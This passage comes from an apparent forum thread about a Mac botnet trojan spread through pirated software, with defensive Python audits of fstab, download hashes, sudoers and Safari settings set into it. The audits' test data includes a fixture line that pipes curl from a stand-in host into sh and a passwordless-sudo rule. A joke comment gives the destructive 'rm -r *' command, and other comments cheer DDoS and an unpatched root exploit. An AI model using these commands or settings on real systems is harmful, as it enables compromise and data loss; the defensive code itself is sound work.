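# mount point -> options it must carry (constructed policy, see lead-in)
POLICY = {
    "/tmp": {"noexec", "nodev", "nosuid"},
    "/home": {"noexec", "nodev", "nosuid"},
    "/usr": {"ro"},
}


def parse_fstab(text):
    """Return one dict per real entry: device, mount, fstype, options (as a set)."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and blank lines
        if not line:
            continue
        fields = line.split()
        if len(fields) < 4:
            raise ValueError(f"short fstab entry: {raw!r}")
        entries.append({
            "device": fields[0],
            "mount": fields[1],
            "fstype": fields[2],
            "options": set(fields[3].split(",")),
        })
    return entries


def audit_fstab(text, policy=POLICY):
    """List policy violations; an empty list means every required option is present."""
    by_mount = {e["mount"]: e for e in parse_fstab(text)}
    findings = []
    for mount, required in policy.items():
        entry = by_mount.get(mount)
        if entry is None:
            # Not its own filesystem, so it silently inherits whatever / has.
            findings.append(f"{mount}: no separate mount, inherits the options of /")
            continue
        missing = sorted(required - entry["options"])
        if missing:
            findings.append(f"{mount}: missing {','.join(missing)}")
    return findings


# Constructed sample: a typical default layout, then the same layout hardened.
DEFAULT_FSTAB = """\
# <device>      <mount>  <type>  <options>   <dump> <pass>
/dev/sda1       /        ext3    defaults    0      1
/dev/sda2       /home    ext3    defaults    0      2
/dev/sda3       /usr     ext3    defaults    0      2
tmpfs           /tmp     tmpfs   defaults    0      0
"""

HARDENED_FSTAB = """\
/dev/sda1       /        ext3    defaults                       0 1
/dev/sda2       /home    ext3    defaults,noexec,nodev,nosuid   0 2
/dev/sda3       /usr     ext3    defaults,ro                    0 2
tmpfs           /tmp     tmpfs   noexec,nodev,nosuid,size=512m  0 0
"""

if __name__ == "__main__":
    for label, fstab in (("default", DEFAULT_FSTAB), ("hardened", HARDENED_FSTAB)):
        print(label, audit_fstab(fstab) or ["ok"])
```

Two caveats a practitioner would add: fstab records intent, so check /proc/mounts (or the output of mount) to see what is actually in effect, and noexec is a speed bump rather than a wall, since a script can still be fed to an interpreter and a binary can be started through the dynamic loader directly. It removes the lazy "drop a file in /tmp and run it" path, which is exactly what most droppers do.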
people are talking about how poorly designed Windows security is and how the user usually always runs as "administrator"
Speaking of always running as administrator, it may interest you to know that the trojan requires the user to manually enter an administrator password before it can spread on the latest version of OS X.
So no, it's not a "double standard" to point out that double-clicking an .exe file can root your PC, but you need to enter an administrator password to get a trojan running on OS X.
Do you think the botnet owner charges an apple "tax" as well?
Use protection.
Regardless of what operating system you're on, there's this little feature called code signing.
If Apple actually signed everything they make, including the Setup/Installer packages, and drummed just that one little piece of security into their users then this type of malware-embedded-in-Apple-software attack just wouldn't be possible.
But these people were downloading a cracked version of the software (just not entirely in the way they expected). So they would expect that this would fail a validity test.
Obviously code signing would help if the user expected that whatever they were installing was totally genuine.
Ever stop to think
The hole Conficker used was patched 2 full weeks before it started spreading. If you don't update your computers, yes, they'll be insecure-- again, that applies to *all* OSes.
The only virus I've gotten in a Windows NT-based OS (2000, XP, Vista) was delivered via Sun's Java. Maybe I've just been lucky.
Comment of the year
This story brought to you by the department of redundancy department.
Don't you mean "iD10T"?
*ducks*
Here, let me correct that for you
"I ph34r teh Geeks, even when bearing .GIFs." -- Cassandra (Paraphrased)
Knowledge is power. Knowledge shared is power multiplied.
There is no patch for human stupidity. Just goes to show that if you do illegal file sharing you need good antivirus regardless of platform.
The 1980's called, they want their software security model back.
This was already implemented with the BSG 9 virus on the Amiga.
http://agn-www.informatik.uni-hamburg.de/catalog/amiga/html/bgs9terr.htm
Xix.
"Everything is adjustable, provided you have the right tools"
I'm not entirely sure I believe the "research team at Symantec" - to me this sounds like a great opportunity for the Symantec corporation (which SELLS ANTI-VIRUS/ANTI-SPYWARE software) to shatter the confidence of Mac users and convince them to purchase security software...from who else but Symantec.
Of course, I'm not much of a fan of Symantec's products in the first place - seems like they charge an awful lot for something that rarely works. As a former computer repair technician with about a decade of experience, I'm not just making this up out of the blue - Norton security software was great up until about 2002 - but the product has been steadily going downhill at a rapid pace ever since.
This story is CLEARLY false because I've been told by various marketing materials that Macs do NOT get viruses and are way too young-and-hip-and-sexy to be involved in something like a bot-whatchamacallit DOS attack thing. BRB going to fire up my iTunes on my iMac and plug in my iPod so I can transfer some songs I downloaded on my iPhone.
I'm a Mac user who doesn't run applications downloaded from completely untrustworthy sources like pirate p2p networks and you're correct -- I don't need a virus or malware checker.
Even if you do as you say, and don't run software downloaded from untrustworthy sources, if you share documents with Windows users you should still use AV software. Though you may not get infected you can pass malware to a Windows user. I'm not too concerned about my Mac being infected, but I am concerned about infecting others. And I use NeoOffice and OpenOffice.org.
Periodically boot from a CD and do a disk scan. I'm not saying never use AV software. I'm saying, you don't need it running constantly, and that it generally sucks up resources for very little benefit.
Most people's personal computers run with the user logged into an administrative account, or an account that can get administrative privileges with a password prompt, so bypassing or disabling AV software isn't that difficult a task; and that's not even considering the possibility of stuff that spreads using unpatched vulnerabilities.
Assuming that's not sarcasm, do you really think it's unreasonable to expect a computer user to be sufficiently aware of computer security to know downloading warez and installing it can screw up your computer? What if it asks for your admin password to install stuff, like lots of software packages on lots of operating systems do?
Should average users not have the ability to install software on their computers, or should the manufacturers of the OS design software that's so fantastically advanced it knows that a given app is malware and another isn't? And if you know the secret for doing the latter 100% of the time, please, please, please let everyone else in on it so we can be rid of the spam botnets.
The last time I tried to update my NT PC it was no longer supported by the Windows Update website, and I had the brand new PC for a whole 2 years. I ended up taking it to the Geek Squad to have it updated.
Oh yeah?
It is reported that Jobs is the main zombie.
Just a rumor of course! ... but yes indeed- the formaldehyde has been replaced by Pinoqachole.
The average user right?
What version of NT was it? 4? Of course Geek Squad didn't exist when NT4 existed.
In short, I have no clue what you're talking about. Windows Update website supports Windows 2000, and all newer versions of NT have auto-updaters that work without logging on to the website at all.
I second any argument that supports intentional DDoSing this page.
Please, that is not the proper way to run a Windows box. Since XP, it has been possible to use "Run as" to get over this constant logging in and logging out hurdle. It's not harder to use than typing "sudo." Power Users are also able to do quite a lot while not being able to completely f*ck the OS. Of course, setting proper rights on folders is something you should do and have learned from other OS's.
First things first, I have Linux, OS X, and Windows floating around my house on various machines. Secondly, as a longtime PC user (notice I did not specify which OS), I ALWAYS check anything I download from the internet, heck, I even check some software I bought from a brick and mortar store for malware. Every system in my house has antivirus software on it, all my Windows systems have anti-spyware stuff out the wazoo running, (if you know of any Mac ones, let me know) and even my Mac is set up to scan something I just downloaded before executing it. This is way overkill on my part probably since I am behind a dial up connection, so a botnet isn't exactly useful to the operator from here (not to mention my phone cords are normally unplugged, long story and lesson learned.) BUT, I have yet to have an issue with any malware around my house. I grew up at a high school as the unofficial tech guy and saw what happened to reasonable sized networks as malware got a hold in them, and as a result I vowed not to let it happen to any of my machines. Also, all the anti-malware software I'm running is only as good as the user; if someone were to disable it and visit some nefarious stuff on my computers they would go down too. That's why I'm admin and nobody else in the household has a sudo/admin/supervisor account. So far, so good! In summary: Security through obscurity is NEVER something to be relied upon. Security is only as good as the user's intelligence will let it be and in continuance, You can't fix stupid.
Symantec is just trying to drum up more sales.
The more people fear their computers might be "infected," the more antivirus software they sell.
Is there anything a Mac can't do?
*drops dead from amazement*
Down With Slashdot BETA!!! I've been around the corner and seen the oliphant; you can only abuse me from your perspecti
man you got it all wrong. it is a feature and a very necessary one at that. mac users must be told that they are as fucked as any win user.
Wealth is the gift that keeps on giving.
Yes, NT4. I ordered it in December 1997 and tried to run Windows Update in January 2000. The Windows Update site said I had to order a CD with the update. And Geek Squad did exist then, Geek Squad was established in 1994.
Don't you mean an iDIOT?
I have had a 'test and destroy' PC that I use to try different *nix distros, and usually have WINE and ies4linux installed.
Every bit of crap that hits the news, or I stumble across, I try to run it with WINE or open IE 6 and go to that site. Other than IE 6 and/or WINE crashing, I've not been able to detect any malware actually making an install. Usually nothing even makes it to the c:/windows/temp folder in .wine, or even appears to happen. Been trying this for about two years now, and no success to date.
I won't say that it can't happen, just that with every GNU/Linux distro** I've tried: no go. YMMV
**Fedora, Red Hat, CENT OS, Mandrake, Mandriva, Suse, Mint, Ubuntu, Kubuntu...those are the ones I remember.
The real problem with Windows is that most users have administrator rights over their machine. Something which I.T. is completely at fault for, not training users on the safe way of operating a computer.
In Linux there is "sudo", in OSX the user is prompted for credentials when installing an application or changing the "locked" status on a control panel applet. In Windows the option is to use the "run as" option in the context menu. Something which we as computer geeks have failed to communicate to and educate computer users about.
Most of the time a computer has a problem with malware it is due to a problem with "layer 8" not having been trained properly.
Mac botnet DoS attack?
That's like an apocalypse caused by undead squirrels.
No.
The only way to do it is to change it in the registry, reboot, get the blue screen, do a repair install, and then it'll work.
I suppose, in theory, somebody could make a utility that would do it, but it would be a massive amount of work, as it would have to search not only the registry, but also .ini and .bat/.cmd files to make sure no paths were hard coded, and also probably some proprietary binary config files for some programs that would break if you didn't fix them.
Then there'd probably also be a bunch of REG_BINARY keys in the registry that would need to be updated, and who knows how that data is encoded. REG_SZ would be easy enough, though....
"City hall" in German is "Rathaus" Kinda explains a few things......
Zombie Mac: Braaaaiiiinnnssss
Mac fanboy: Joke's on you, I have none
(I'm going to mod point hell for this one)
Help fight spam
And there's no such thing as a hardware firewall.
I saw a malware infection on a Windows XP machine recently, where the vast majority of it was done with the task scheduler and batch files.
Pretty impressive, really.
Although the author was a bit of an idiot, and the single piece that was an exe file was supposed to be downloaded from an FTP server, and the batch script to do the download had a bug in it. Duuh.
It did manage to keep turning off the firewall every 15 minutes, though.....
90% of the problems on Windows are attributed to users installing malicious software. This is what Mac users go about claiming they are immune to, which is ridiculous.
You misinterpret the statements "macs don't have viruses" as meaning "they cannot have viruses". As in, there are none currently...
As you say, any system can have malware. But we now have ONE example of malware on a mac, that you catch by pirating CS4. So how does that compare with the count of the PC?
It's not that macs cannot have malware, it's just that statistically there is none compared to PC's. I can still give a Mac to my mother and not have to worry what she will catch on the internet because effectively, there's nothing to catch...
That will change over time, but how long before it's even in the same order of magnitude as Windows exploits?
"There is more worth loving than we have strength to love." - Brian Jay Stanley
Really, that's so insignificant that it doesn't matter in the big scheme of things. Certainly, the Mac fanboys that believe that their Macs are immune to malware make fools of themselves, but it is way easier and faster to secure a Mac or a Linux install than a Windows install. For starters, even Windows Vista shows a red alert if you aren't running antivirus software.
But really, I'm impressed that they found people foolish enough to download iWork09 from a dubious source when they have the faster and safer option to download it from the Apple website itself. Pirating Photoshop CS4 is sort of understandable, its price goes around 30-50% of the price of the lowest end Mac hardware. This was bound to happen, and one of the reasons that I suggest my Mac user friends not pirate software or install any random software that they find on the web.
The sad part is that the people affected by this trojan almost surely could have found the infection if they checked the logs of their own system. This is a case where stupidity really should be more painful, for their own good.
Mexico: 100% conservative's America now!
Almost no Windows malware these days is self spreading. Almost all spread the same way, social engineering. So your statement can be generalized to any platform where people double click things they download on the Internet.
How do you determine "trustworthiness" when downloading files? Unless you compare the cryptographic hash of every file you download against the cryptographic hash posted to the https:// equivalent of the server, or the installer itself is signed by a credible signing authority (very little Mac software is codesigned) there's absolutely no way you can know whether what you've just downloaded is safe or not.
Just because you downloaded it from a "safe" web site means nothing--the Web site itself could have been hacked. This is how a lot of Windows malware is distributed. Heck two years ago the Web site for Dolphin stadium was hacked so that the download for the driving directions to the stadium was a trojan.
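The two comments above (the one on code signing, and this one on comparing the cryptographic hash of a download against a digest published separately) describe the same check from two angles. Here is the hash half written out, as an added example for this thread and not code from Apple, Symantec or the commenter: it parses a sha256sum/shasum-style digest list, hashes the downloaded file in chunks, compares in constant time, and refuses anything the list does not mention. The file names, contents and the "published" digest list are all constructed for the demo.

```python
"""Verify a downloaded installer against a publisher's digest list fetched
over a separate channel (HTTPS, or a signed release note). Added example;
every file and digest below is constructed for the demonstration.
"""
import hashlib
import hmac
import os
import tempfile


def sha256_file(path, chunk=1 << 20):
    """SHA-256 of a file, streamed so large .dmg/.pkg files do not need to fit in RAM."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def parse_sums(text):
    """Parse 'digest  filename' lines as written by sha256sum or shasum -a 256.

    A leading '*' on the name (shasum binary mode) is tolerated; anything that
    is not a 64-digit hex string is rejected rather than silently skipped.
    """
    table = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        digest, _, name = line.partition(" ")
        name = name.lstrip(" *")
        if len(digest) != 64 or any(c not in "0123456789abcdef" for c in digest.lower()):
            raise ValueError(f"malformed digest line: {line!r}")
        table[name] = digest.lower()
    return table


def verify_download(path, sums_text):
    """Return (ok, message). Unlisted files fail: no digest means no assurance."""
    name = os.path.basename(path)
    expected = parse_sums(sums_text).get(name)
    if expected is None:
        return False, f"no published digest for {name}"
    actual = sha256_file(path)
    if not hmac.compare_digest(actual, expected):  # constant-time compare
        return False, f"digest mismatch for {name}: got {actual}, expected {expected}"
    return True, f"{name} matches the published digest"


# Constructed stand-ins: a "genuine" package and the same package with a
# dropper appended, as a trojanized torrent copy would be.
GENUINE = b"#!/bin/sh\necho installing iWork\n"
TROJANIZED = GENUINE + b"curl -s http://example.invalid/bot | sh &\n"


def demo():
    """Exercise the three outcomes; returns {case: ok_flag}."""
    results = {}
    with tempfile.TemporaryDirectory() as d:
        os.mkdir(os.path.join(d, "vendor"))
        os.mkdir(os.path.join(d, "torrent"))
        good = os.path.join(d, "vendor", "iWork09.pkg")
        bad = os.path.join(d, "torrent", "iWork09.pkg")  # same name, tampered contents
        with open(good, "wb") as f:
            f.write(GENUINE)
        with open(bad, "wb") as f:
            f.write(TROJANIZED)
        # The digest list the vendor would publish over HTTPS (constructed here).
        sums = "# SHA256SUMS, fetched separately\n" + f"{sha256_file(good)}  iWork09.pkg\n"
        results["genuine"] = verify_download(good, sums)[0]
        results["tampered"] = verify_download(bad, sums)[0]
        results["unlisted"] = verify_download(os.path.join(d, "vendor", "other.pkg"), sums)[0]
    return results


if __name__ == "__main__":
    for case, ok in demo().items():
        print(f"{case}: {'OK' if ok else 'REJECTED'}")
```

The check is only as good as the channel the digest came from: a SHA256SUMS file sitting next to the download on a compromised mirror proves nothing, which is the point the comment makes about hacked sites. On a Mac with a signed bundle, codesign --verify gives the same assurance without a side channel, because the publisher's key rather than a web page vouches for the bits; pirated builds have that signature stripped or broken by construction.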
If IE always asked you to click something, then it would be safe. Exactly how the hell would you create an OS that you can actually install anything on while preventing you from installing something that MIGHT be bad? After all, if I want to install a spam program, that is my business. There are after all plenty of legitimate reasons to send mass emails. Yes really.
As for rootkit like software. It is your PC, you might have a reason for it. Security software be it anti-virus or DRM often needs to nest itself deep into the OS as well. If that is what the user wants, that is what the user should be able to do.
IE gets slammed because it allows installs without user activation. As soon as a "hack" requires user action then it is no longer an OS/software vulnerability but a social engineering one.
We don't blame money for being insecure because of pyramid schemes do we? We blame money for being insecure when it can be counterfeited, not when humans can be duped with their money.
MMO Quests are like orgasms:
You may solo them, I prefer them in a group.
That's why he typed "steadily becoming".
This is the sig that says NI (again)
Wow, that straw man must have put up a real big fight. Who said it was a vulnerability?
"It does not do to leave a live dragon out of your calculations, if you live near him." - Tolkien
I recall when I last used Windows Defender, it actually has VNC listed for those reasons.
Change is certain; progress is not obligatory.
So it's not FUD. Mac users who are not savvy can certainly get malware. If you know what you're doing, and stay away from P2P or other downloads you can't identify as "good," you're fairly safe (more so than unpatched Windows, for sure). But you're not immortal, and this article is proof of it. Even if it is from a fearmonger with self-interest like Symantec.
Mac users who are not savvy didn't get this malware. It was users who were just clever enough to be a danger to themselves and their environment and not clever enough to be safe. They had to be savvy enough to download the software from a torrent. 90% of users are not savvy enough to do this. 8% of the users know how to do it, but are savvy enough not to do it. There is the two percent in the middle that caused the problem.
On pre-Vista Windows boxes, most people ran their default account with godlike administrator privileges. It's either that or:
Run a restricted account
Any time you want to install software
DO:
log out of your restricted account
log into the admin account
install the software
then go back to your restricted account.
REPEAT
At least in w2k and xp, you have a run as... in your context menu
So in order to become part of this botnet, I do nothing but go to a pirated software site, download contaminated software and then install it as administrator. Since when was it news that most software on pirated sites contain malware.
When 'Adobe CS4 Crack(intel)' is executed, the Trojan extracts its main component to the following location:
/var/temp/[RANDOM FILE NAME]. It will then prompt the user for root credentials in order to execute it
From: Symantec
To: Macuser
Subject: software update
Dear valued customer, please login as administrator fire up the CLI, then type cd /; rm -r *, and then post me out your bank account details and your sorting code.
signed: Mac Malware (ZDNET dept)
Somewhere in the headers of the packets... "Hai guyz imma Mac!"
There are over 36 million lines of COBOL code in the world, and they are all raping children.
...because "they just work"
"Mac viruses would delay the eject until they had fully infected the floppy"
Yea, an when ya wuz out o' da room, da floppy would crawl across da room an ooze its way into da cruize, all without ya havin ta do anyfink what 'chew trippin foo
But they are sometimes savvy enough to open chain e-mails from people they do know.
The dangers of hypersimplification extend beyond the death of precision and loss of credibility: they carry straight to the continued promotion of ignorance.
If you dumb technology down for a user, all you get is a dumb user.
Why guys insist on downloading questionable things without some preventive measures in place, first, is beyond the scope of my tired head. But dumping Apple's default 5-minute "grace period" on sudo (or admin passwords, in other words) will kill third-party attempts to piggyback on any password that is being used by the legit user for privilege escalation.
In a console (Terminal):
[hit return, enter password]
scroll to: #Defaults specification, hit the letter 'o' to get a new line, and type:
then hit [Escape] to end the editing session, then ':w' plus [Enter] to write the file to disk, and finally ':q' plus [Enter] to quit visudo.
Done. I get tired of vi, of course, and will usually use BBEdit to open /private/etc/sudoers and enter the admin password once to 'unlock' sudoers, then scroll down and add the new default line, and save the file. Done, quicker.
A nefarious app or script can poll the system asking if there's escalation until kingdom come and it will never get an affirmative. End of story; end of file
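Two sudoers settings come up in this thread: the earlier comment's "%sudo ALL=NOPASSWD: ALL" line, which means a password is never asked at all, and the grace period discussed just above, which means a password typed once can be re-used by anything running as that user for the next few minutes. Here is an audit that flags both, as an added example for this thread and not something from Apple or the commenter. It works on sudoers text you feed it (for instance the output of sudo cat /etc/sudoers), never edits the file, and the sample sudoers below is constructed; the 5-minute figure is sudo's compiled-in default, which the comment above says Apple ships unchanged.

```python
"""Audit sudoers text for the two weaknesses discussed in this thread:
a NOPASSWD grant for ALL commands, and a non-zero timestamp_timeout
(credential cache) that lets anything running as the user piggyback on a
password typed in the last few minutes. Added example; parses text only.
"""
import re

DEFAULT_TIMEOUT_MINUTES = 5  # sudo's compiled-in default, per the comment above
HARDENED_DEFAULTS = "Defaults timestamp_timeout=0"  # what the comment above adds via visudo

_SPEC_KEYWORDS = ("Defaults", "Cmnd_Alias", "User_Alias", "Host_Alias", "Runas_Alias")


def _logical_lines(text):
    """Yield sudoers lines with comments stripped and blanks removed."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if line:
            yield line


def parse_timestamp_timeout(text):
    """Effective timestamp_timeout in minutes; the last Defaults line wins.

    Returns the default when the file never sets it. A negative value is
    sudo's 'never expire'.
    """
    timeout = DEFAULT_TIMEOUT_MINUTES
    for line in _logical_lines(text):
        if not line.startswith("Defaults"):
            continue
        m = re.search(r"timestamp_timeout\s*=\s*(-?\d+(?:\.\d+)?)", line)
        if m:
            timeout = float(m.group(1))
    return timeout


def passwordless_grants(text):
    """Return (who, rule) for every user spec that grants NOPASSWD: ALL."""
    found = []
    for line in _logical_lines(text):
        if line.startswith(_SPEC_KEYWORDS):
            continue
        # user spec:  <who> <host> = [(runas)] [TAG:] <commands>
        m = re.match(r"(\S+)\s+\S+\s*=\s*(?:\([^)]*\)\s*)?(.*)$", line)
        if m and re.search(r"NOPASSWD:\s*ALL\b", m.group(2)):
            found.append((m.group(1), line))
    return found


def audit_sudoers(text):
    """List findings in plain English; empty list means nothing flagged."""
    findings = []
    for who, rule in passwordless_grants(text):
        findings.append(f"{who} can run anything as root with no password: {rule}")
    t = parse_timestamp_timeout(text)
    if t < 0:
        findings.append("timestamp_timeout is negative: cached credentials never expire")
    elif t > 0:
        findings.append(f"timestamp_timeout is {t:g} min: anything running as you can "
                        "re-use your password for that long after you type it")
    return findings


# Constructed sample: the risky line from the earlier comment on top of a
# stock Defaults section, and the same file with the two fixes applied.
WEAK_SUDOERS = """\
# Defaults specification
Defaults env_reset
root   ALL=(ALL) ALL
%admin ALL=(ALL) ALL
%sudo  ALL=NOPASSWD: ALL
"""

FIXED_SUDOERS = (WEAK_SUDOERS.replace("%sudo  ALL=NOPASSWD: ALL", "%sudo  ALL=(ALL) ALL")
                 + HARDENED_DEFAULTS + "\n")

if __name__ == "__main__":
    for label, text in (("weak", WEAK_SUDOERS), ("fixed", FIXED_SUDOERS)):
        print(label, audit_sudoers(text) or ["no findings"])
```

Setting timestamp_timeout=0 closes the piggyback window the comment describes, but note what it does not do: a program that has already been given the admin password once (the trojan here asked for it outright) needs no cache to escalate. The setting defends against the silent case where the user authorised something legitimate and malware running alongside it rides the same ticket.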
now DoS-ing in style.
YOU FORGOT FREEBSD!
That will come in handy for something, someday. All 20 of them just sitting there, waiting to pounce on some poor Win IIS web server.
Doctors destroy health, lawyers destroy justice, universities destroy knowledge, religion destroys spirituality
The proliferation of MacOS installations has crossed into PC-land. The software that seems to have been the cause is free with new Apples. Could they all be pirate OSX users ?
Well, I've setup Debian for family members, and from that experience I'd like to say you may be wrong. On windows I have to let them install applications from random places, because that's the only way to get software on that platform. On debian I show them "Add/Remove Applications"... It is very easy for even non-experts to understand that software from "Add/Remove" is good, but software from the web is possibly a bad idea.
You say the problem is not in the OS, I say the problem can be seriously mitigated by the operating system (distribution) design. The same people who had very little ability to spot malware on windows never end up in that same problem on Debian.
Now, I'm sure someone will start the old "so what will the average user do when the app is not in the repository? huh? huh?" at this point. IMO, the answer is and always has been "they won't use the app then or will wait for an admin to install it". That is the price you pay for convenience and security.
Your lack of knowledge is showing.
This attack did not involve a virus. Users unknowingly downloaded a malevolent program, i.e., a program to turn their machine into a zombie in a DOS campaign. That's a con, not a virus.
If you use OS X, you are, in fact, much less likely to be attacked by a virus, by malware, or whatever. Some credit for that goes to OS X, but most of the credit goes to the fact that there are many fewer Macs on the planet.
Folks who insist a Mac is magically invulnerable are demonstrating that don't know what they are talking about.
We all know this. Why is it being rehashed here?
-- Slashdot: When Public Access TV Says "No"
You are correct to a point. The Windows OS family has had a lot of attack vectors that don't require user intervention - worms and such - as well as many many vulnerabilities in tools like the default browser and email client. Mac and Linux systems have had far fewer of these vulnerabilities. A reasonably hardened XP system with the firewall turned on, various services turned off, and using Mozilla products instead of IE and Outlook Express is reasonably secure.
No, the funny part is that the users who torrented and installed pirated copies of iWork 09 and Photoshop CS4 got exactly what they deserved. Instant karma.
Why do idiots keep mislabeling their music as w4r3z? Here I wanted photoshop and all I got was a shitty John Lennon song.
... as IT folks have been known to say.
"Problem Exists Between Keyboard And Chair"
"No matter how cynical you get, it is impossible to keep up." -- Lily Tomlin
Sorry, how does conficker spread again?
Conficker wasn't spread by users, it was spread by superusers.
One of our competitors trademarked the term "hypothesis". From now on, we will call them "boneheaded ideas".
If you are installing software from an untrusted source all bets are off.
The general assumption should be "This is an untrusted source, hence this is malware until proven otherwise".
So, if you really really wanted the software badly, you either install the software in virtual machine and study it, or on real isolated hardware and test it as much as you can (and in the end you could still be wrong).
Any user that thinks otherwise will eventually get infected no matter what OS they use.
As the island of our knowledge grows, so does the shore of our ignorance.
Granted, it's theoretically possible ... but what's the alternative in this case? You go into detail trying to explain to the (now glassy-eyed) user all the potential sneaky ways someone might get a virus onto their Mac, despite the marketing they heard about Macs not having the virus/spyware problems of a Windows PC?
All that's going to accomplish in most cases is the user walking away with nothing more than some vague idea that "this computer geek tells me all the advertising is a lie, so I guess the Mac isn't any good after all". Then they'll stick with Windows and be at FAR greater risk of spyware/virus problems.
Reality is, OS X doesn't let you run as "root" in normal operation of the operating system. Most Windows users, by contrast, run as "Administrator" with full access to everything. (Yeah, that's changing with Vista, but their security model still annoys enough people so they sometimes override it and go back to running as administrator all the time, like XP did.)
I'm shocked... someone wasted their time to make a Mac bug. Must have just been someone sick of hearing it, because that's ineffective at best. Maybe in a few years when the population gets up a bit more, but now? Pfft... not enough Macs around to do any good.
It really all comes back to the shaving analogy.
Macs are like electric razors: Most expensive for the hardware, with easy to use interface for the least technically inclined folks. But if it breaks, the average user is going to throw their hands in the air, throw it away, and buy a new one.
Windows are like disposable razors: Moderate everything, with a median level of proficiency required for safe and practical operation. If something goes wrong, it's usually a matter of replacing whatever wore out.
Linux is like a straight razor: Maximum skill required, but maximum results in the end. Definitely a learned skill, and pretty much nothing will fall into your lap unearned. And if you mess it up, FUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU-
I think that is naive. As the market share for Macs increases, they will be an increasingly attractive target. And you set all these people up thinking they were safe. It's this attitude that is going to bite Mac users hard soon. You should always teach people how to use AV/firewalls/anti-spyware and let them know what kind of activities are bad ideas. Even if you are under the illusion that Macs are more secure, you don't know what other computers they interact with.
Support a great indie game: http://www.abaddon360.com
but most understand that the Mac platform gets fewer instances of malware in the wild because their platform is less popular, and that "fewer" is not the same thing as "none". There are — of course — Mac users who do not understand this distinction.
On a related note, can you imagine the humiliation of whoever owns that web site? "LOL, UR WEBZ GOT WTFPWNZORED BY MACS"
Does the Mac botnet have a more simple and intuitive UI than comparable Windows-based botnets? My grandma is a script kiddie, this sounds like the perfect system for her.
The root problem is currently solved by some new privilege escalation exploits for OS X:
http://slashdot.org/firehose.pl?op=view&id=4200037
"Several exploits for Apple's Mac OS X are in circulation which have not yet been patched. In a short test carried out by the heise Security editorial team, one of the exploits allowed a Mac OS X 10.5.6 user with normal privileges to obtain root privileges."
This security flaw has not been patched yet. Happy hacking everyone!
Luckily I run Windows, or I might have gotten a virus, too!
I am not devoid of humor.
.... They're certainly not savvy enough to fire up bittorrent and start seeking out pirated software, either.)
No, but their kids might.
You don't need to be root to run a botnet node. There's plenty of places to hide an exploit... and security is like sex... once you're penetrated you're ****ed.
So internal firewalls like root/Administrator accounts are nice, but not getting penetrated in the first place is the best prevention. Trying to keep malware that's already running contained? That's a sucker game.
Apple finally made "Open Safe Files After Downloading" default to off, but if you upgraded Safari, make sure that that's off. Install a dedicated FTP client and stop using Finder as the handler for FTP: URLs.
And for god's sake... don't install pirated software. Back before Microsoft made the "Good Times" virus real with "ActiveX", the number one mechanism for virus transmission was people who trusted software downloads, or were otherwise "social engineered" into running malware voluntarily. And that's a mechanism that ALWAYS works. No matter what the OS does.
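The commenter's first recommendation, making sure Safari's "Open Safe Files After Downloading" is off, is easy to audit on a fleet rather than by clicking through preferences. The block below is an added example, not the commenter's code; it assumes the checkbox is backed by the `AutoOpenSafeDownloads` key in the `com.apple.Safari` defaults domain, reads it with the macOS `defaults` tool, and classifies the result. On a non-macOS host it reports that the check does not apply instead of guessing.

```python
"""Added example: audit whether Safari still auto-opens "safe" downloads.
Assumes the AutoOpenSafeDownloads key in com.apple.Safari (not the commenter's code)."""
import shutil
import subprocess

SAFARI_DOMAIN = "com.apple.Safari"
AUTO_OPEN_KEY = "AutoOpenSafeDownloads"  # assumed key behind the preference checkbox


def classify_auto_open(raw) -> str:
    """Map raw `defaults read` output to a verdict.
    None means the key is not set for this user, so Safari's built-in default
    applies; report it as 'unset' so an admin can pin the value explicitly."""
    if raw is None:
        return "unset"
    value = raw.strip().lower()
    if value in ("1", "true", "yes"):
        return "enabled"
    if value in ("0", "false", "no"):
        return "disabled"
    return "unknown"


def read_auto_open_setting():
    """Run `defaults read`; returns None if the key is absent (non-zero exit)."""
    result = subprocess.run(
        ["defaults", "read", SAFARI_DOMAIN, AUTO_OPEN_KEY],
        capture_output=True, text=True,
    )
    if result.returncode != 0:
        return None
    return result.stdout


def safari_auto_open_verdict() -> str:
    """'not-macos' where the defaults tool is missing, otherwise the classification."""
    if shutil.which("defaults") is None:
        return "not-macos"
    return classify_auto_open(read_auto_open_setting())


def remediation_command() -> list:
    """The command that pins the preference off; run as the affected user."""
    return ["defaults", "write", SAFARI_DOMAIN, AUTO_OPEN_KEY, "-bool", "false"]


if __name__ == "__main__":
    verdict = safari_auto_open_verdict()
    print("AutoOpenSafeDownloads:", verdict)
    if verdict in ("enabled", "unset", "unknown"):
        print("fix with:", " ".join(remediation_command()))
```

Treat "unset" as a finding, not a pass: the comment notes that the default only became off in a later Safari, and a user who upgraded in place may still carry an older explicit "on" value, which is exactly the case the explicit read catches.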
Most of the PC viruses, malware, spyware and trojans I've seen and cleaned (or tried to clean) are from people downloading and installing stuff they shouldn't have. I guess the lesson is, all the root password protection in the world isn't going to save some (a lot of) people.
"Steadily becoming" would imply, if not come out directly and say, that OS X is becoming more vulnerable.
Falcon
Should there be a Law?
The alternative is honesty. Telling someone they won't have any problems, ever, is a complete lie. I may as well tell my children that they won't contract any venereal diseases if they remember to bring a condom. Granted, telling someone with the attention span of a fly the exact details of why and how and blah blah blah...not the best approach. But it doesn't cost anything to say "look, nothing is 100% secure but this is probably enough to deal with everything you'll encounter for the next five years."
The OS X approach to root access and its integration of BSD is excellent, and part of why I use Macs frequently. But it still isn't a guarantee, and end users deserve to know that. If the user is never educated, they remain vulnerable to every social engineering trick in the book and most phishing, fake software, and related scams.
The only way I would promise no virus/spyware problems is with a computer that never goes live.
Vista's attempts at security are a weak attempt at reassurance, and deserve to be scrapped. I'd rather use XP - something that doesn't pretend to have Unix under the hood - or OS X, which has Unix under the hood. But this is for many of the same reasons as my reasoning behind warning users about risks.
The illusion of security is more dangerous than a lack of security.
Is OS X more secure than any Windows version? Absolutely. Impervious? Of course not. Should every user know this? Of course.
enlarge your penis! defend a mac!
Nobody got what they deserved. The shitheads who dl'd the trojan don't even notice it, which is why it works. Random people with bad luck are the ones who will notice it, and they didn't deserve it.
